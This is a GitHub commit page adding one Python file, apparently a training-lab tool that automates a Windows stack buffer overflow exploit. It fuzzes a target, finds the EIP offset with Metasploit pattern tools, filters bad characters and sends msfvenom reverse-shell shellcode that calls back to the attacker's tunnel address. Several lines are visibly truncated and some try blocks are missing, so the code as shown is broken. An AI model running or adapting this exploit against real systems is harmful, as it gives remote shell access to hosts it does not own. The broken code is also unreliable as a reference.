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the-c0d3r committed Nov 25, 2020
0 parents commit 7e335c0
Showing 1 changed file with 269 additions and 0 deletions.
269 changes: 269 additions & 0 deletions
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@@ -0,0 +1,269 @@
import binascii
import socket
import struct
import subprocess
import time

from typing import Union

def execute(command: str) -> None:
"""function to execute command and print out the command"""
print(f"[+] Executing: {command}")
process =, capture_output = True)
print("stdout: ", process.stdout.decode())
print("stderr: ", process.stderr.decode())

def send_data(data: Union[bytes, str], timeout: int = 5) -> None:
"""function to send bytes to the target"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
print("[+] Received: ", s.recv(1024).decode())

if type(data) == str:
data = data.encode()

print("[+] Received: ", s.recv(1024).decode())

def fuzz(start: int = 100, end: int = 10000) -> int:
"""fuzz the application with increasing size of buffer"""
while start <= end:
fuzz_str = "A" * start
print("[+] Fuzzing with %s bytes" % len(fuzz_str))
send_data(prefix + fuzz_str.encode() + suffix)
start += 100
except ConnectionRefusedError:
print("[-] Connection refused")
except socket.timeout:
offset = start
print(f"[!] crashed at: {offset}")
return offset

def send_cyclic(offset: int) -> int:
"""Cyclic pattern to send to the app, and check for the exact pattern"""
print("\n[+] Creating cyclic pattern with offset")
command = f"/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l {offset} > pattern.buf"
buffer = open("pattern.buf", "r").read()
input("[~] Press enter to send cyclic pattern (restart the app)")

send_data(prefix + buffer.encode() + suffix)
except socket.timeout:
print("[~] Crashed the app, check the EIP")

eip = input("[?] Enter EIP value: ")

command = f"/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q {eip.strip()}" + " | awk '{print $6}' > /tmp/offset"

with open("/tmp/offset", "r") as fp:
content =
if content == "":
print("[-] Unable to get a match")
offset = content.strip("\n")
print(f"[+] Offset found at address {offset}")
return int(offset)

def generate_chars(badchars: [str]) -> bytes:
generate all chars after filtering out badchars
:param badchars: ["\\x0a", "\\x0d"]
:return: "0102.."
char_str = ""

for x in range(1, 256):
current_char = "\\x" + '{:02x}'.format(x)

if current_char not in badchars:
char_str += current_char[2:]
# remove the leading "\x"
return binascii.unhexlify(char_str)

def badchars_esp(offset: int) -> str:
input("\n[+] Press enter to send bad chars (restart the app)")
print("[!] pro tip: !mona bytearray -f \"\\x00\"")

# default badchar as \x00
current_badchars = ["\\x00"]

while True:
# convert the hexstring into binary
allchars = generate_chars(current_badchars)

padding = "A" * offset
eip = "B" * 4
esp = "C" * 8

buffer = padding.encode() + eip.encode() + allchars

print("[?] Sending buffer")
send_data(prefix + buffer + suffix)
except socket.timeout:
print("\n[+] allchars sent")

print("[+] current_badchars: ", current_badchars)
print("[!] pro tip: !mona compare -f c:\\path\\bytearray.bin -a esp")
command = input("[+] Enter badchar (\\x00 \\x01 ..) to filter out (type 'exit' to skip): ").strip()
if command == "exit":
elif " " in command:
current_badchars.extend(command.split(" "))
elif command != "":

print("[+] Badchars detected: ", "".join(current_badchars))
return "".join(current_badchars)

def badchars_not_esp(offset: int) -> str:
current_badchars = ["\\x00"]

while True:
# convert the hexstring into binary
allchars = generate_chars(current_badchars)

number = input("[+] Enter amount to send (enter to sendall, exit to end): ").strip()
if number == "exit":
elif number == "":
number = len(allchars)

bindex = int(number)
if bindex > len(allchars):
bindex = len(allchars)

# steps, send all 255, does it crash?

padding = "A" * offset
eip = "B" * 4
esp = "C" * 8

# buffer not in ESP
buffer = allchars[:bindex] + padding[len(allchars[:bindex]):].encode() + eip.encode() + esp.encode()

send_data(prefix + buffer + suffix)
except socket.timeout:
print("\n[+] allchars sent")

print("[+] current_badchars: ", current_badchars)
command = input("[+] Enter badchar to filter out (enter to skip): ").strip()
if command == "exit":
elif " " in command:
current_badchars.extend(command.split(" "))
elif command != "":

print("[+] Badchars detected: ", "".join(current_badchars))
return "".join(current_badchars)

def shell_gen(badchars: str):
"""Generates the shellcode using the vpn tunnel ip address"""
execute("ip addr show tun0 | grep 'inet ' | awk '{print $2}' | cut -d'/' -f1 > /tmp/ip")
ip = open("/tmp/ip", "r").read().strip()
print(f"[+] IP Detected: {ip}")

command = f"msfvenom -p windows/shell_reverse_tcp LHOST={ip} LPORT=443 EXITFUNC=thread -b \"{badchars}\" -f raw > /tmp/shellcode 2>/dev/null"
print("[+] Generated shellcode at /tmp/shellcode")

def exploit(offset):
eip_str = input("[+] Enter EIP address to overwrite (without 0x): ").strip()

padding = "A" * offset
eip = struct.pack("<I", int(eip_str, 16))
nops = binascii.unhexlify("90" * 32)

shellcode = open("/tmp/shellcode", "rb").read()
print(f"[+] Loaded shellcode of size: {len(shellcode)} bytes")

# only if 2nd stage payload required
# register = input("Enter payload register (esp): ").strip()
# assembly = asm(f"jmp {register}; add eax, 4")
# padding_offset = len(padding) - len(nops) + len(shellcode)
# buffer = nops + shellcode + padding[padding_offset:].encode() + eip + esp.encode()

buffer = padding.encode() + eip + nops + shellcode
print("[=] Buffer to be sent: ", buffer)
print("[+] exploiting.. ")
send_data(prefix + buffer + suffix)
except socket.timeout:
print("[+] Payload sent but timed out")

print("[+] Exploitation completed")

def check_esp(offset: int) -> None:
"""function check if esp has large enough room for shelllcode"""
padding = "A" * offset
eip = "B" * 4
esp = "C" * 500

input("[=] Enter to send huge buffer (500 bytes of C) to check for space on ESP")
buffer = padding.encode() + eip.encode() + esp.encode()

print("[?] Sending buffer")
send_data(prefix + buffer + suffix)
except socket.timeout:
print("[+] buffer sent, check for the ESP register content")

def main() -> None:
"""main function to start the exploit"""

offset = fuzz()
offset = send_cyclic(offset)

question = input("[?] Is the payload enough to be sent in ESP (y/n): ").strip()
payload_in_esp = question.lower() == "y"

if payload_in_esp:
badchars = badchars_esp(offset)
badchars = badchars_not_esp(offset)


if __name__ == "__main__":
import argparse

parser = argparse.ArgumentParser(description = "Buffer overflow exploit testing tool")
parser.add_argument("--prefix", help = "prefix of the string to send", default = "OVERFLOW1")
parser.add_argument("--suffix", help = "suffix of the string to send", default = "\r\n")
parser.add_argument("--ip", help = "target ip address", required = True)
parser.add_argument("--port", help = "target port to exploit", required = True)
parser.add_argument("--interface", help = "the interface to use", default = "tun0")

args = parser.parse_args()

global ip, port, timeout, prefix, suffix
ip: str = args.ip
port: int = int(args.port)
timeout: int = 5
prefix: bytes = args.prefix.encode()
suffix: bytes = args.suffix.encode()


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